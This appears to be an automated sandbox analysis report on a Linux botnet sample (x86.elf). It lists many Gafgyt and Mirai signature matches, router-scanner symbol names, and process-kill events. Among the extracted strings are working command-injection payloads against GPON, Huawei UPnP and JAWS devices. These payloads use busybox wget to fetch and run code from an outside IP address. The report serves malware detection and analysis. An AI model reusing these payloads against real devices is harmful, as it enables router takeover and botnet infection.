Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: Process Memory Space: x86.elf PID: 6226, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6226, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6227, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6227, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6228, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6228, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6229, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6229, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6231, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6231, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6232, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6232, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6233, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6233, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6234, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6234, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6235, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6235, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6236, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6236, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6237, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6237, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: x86.elf PID: 6238, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86.elf PID: 6238, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Contains symbols with names commonly found in malware
Source: ELF static info symbol of initial sample Name: vseattack
Sample and/or dropped files contains symbols with suspicious names
Source: x86.elf ELF static info symbol of initial sample: gpon443_scanner
Source: x86.elf ELF static info symbol of initial sample: gpon443_scanner_pid
Source: x86.elf ELF static info symbol of initial sample: gpon443_scanner_rawpkt
Source: x86.elf ELF static info symbol of initial sample: gpon8080_scanner
Source: x86.elf ELF static info symbol of initial sample: gpon8080_scanner_pid
Source: x86.elf ELF static info symbol of initial sample: gpon8080_scanner_rawpkt
Source: x86.elf ELF static info symbol of initial sample: gpon80_scanner
Source: x86.elf ELF static info symbol of initial sample: gpon80_scanner_pid
Source: x86.elf ELF static info symbol of initial sample: gpon80_scanner_rawpkt
Source: x86.elf ELF static info symbol of initial sample: huawei_scanner.c
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_fake_time
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_get_random_ip
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_recv_strip_null
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_rsck
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_rsck_out
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_scanner_init
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_scanner_kill
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_scanner_pid
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_scanner_rawpkt
Source: x86.elf ELF static info symbol of initial sample: huaweiscanner_setup_connection
Source: x86.elf ELF static info symbol of initial sample: jaws5500_scanner
Source: x86.elf ELF static info symbol of initial sample: jaws5500_scanner.c
Source: x86.elf ELF static info symbol of initial sample: jaws5500_scanner_pid
Source: x86.elf ELF static info symbol of initial sample: jaws5500_scanner_rawpkt
Source: x86.elf ELF static info symbol of initial sample: jaws5501_scanner
Source: x86.elf ELF static info symbol of initial sample: jaws5501_scanner.c
Source: x86.elf ELF static info symbol of initial sample: jaws5501_scanner_pid
Source: x86.elf ELF static info symbol of initial sample: jaws5501_scanner_rawpkt
Source: x86.elf ELF static info symbol of initial sample: jaws60001_scanner
Source: x86.elf ELF static info symbol of initial sample: jaws60001_scanner.c
Source: x86.elf ELF static info symbol of initial sample: jaws60001_scanner_pid
Source: x86.elf ELF static info symbol of initial sample: jaws60001_scanner_rawpkt
Source: x86.elf ELF static info symbol of initial sample: linksys_scanner_init
Source: x86.elf ELF static info symbol of initial sample: linksys_scanner_kill
Source: x86.elf ELF static info symbol of initial sample: linksys_scanner_pid
Source: x86.elf ELF static info symbol of initial sample: linksys_scanner_rawpkt
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_fake_time
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_get_random_ip
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_recv_strip_null
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_rsck
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_rsck_out
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_scanner_init
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_scanner_kill
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_scanner_pid
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_scanner_rawpkt
Source: x86.elf ELF static info symbol of initial sample: realtekscanner_setup_connection
Source: x86.elf ELF static info symbol of initial sample: zte_scanner.c
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://188.132.232.158/mips+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://188.132.232.158/mips+-O+/tmp/egg;sh+/tmp/egg`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 188.132.232.158 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: /bin/busybox wget 2>&1
Source: Initial sample String containing 'busybox' found: busybox wget 2>&1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://188.132.232.158/mips+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0 POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://188.132.232.158/mips+-O+/tmp/egg;sh+/tmp/egg`&ipv=0 POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://188.132.232.158/mips+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0 POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample String containing 'busybox' found: 902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfsoraSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsBAdAsVWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismDeportedXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: GET /shell?cd+/tmp;wget+http://188.132.232.158/laws;+chmod+777+laws;+./laws HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;wget+http:/188.132.232.158/laws;+chmod+777+laws;+./laws HTTP/1.1
Source: Initial sample Potential command found: GET /ftptest.cgi?loginuse=
Source: Initial sample Potential command found: GET login.cgi HTTP/1.0
Source: Initial sample Potential command found: GET /ftptest.cgi?loginuse=&loginpas= HTTP/1.0
Sample tries to kill a process (SIGKILL)
Source: /tmp/x86.elf (PID: 6226) SIGKILL sent: pid: 6232, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 6226) SIGKILL sent: pid: 6231, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 6226) SIGKILL sent: pid: 6229, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 6226) SIGKILL sent: pid: 6233, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 6226) SIGKILL sent: pid: 6235, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 6226) SIGKILL sent: pid: 6234, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 6226) SIGKILL sent: pid: 6228, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 6226) SIGKILL sent: pid: 6236, result: successful Jump to behavior
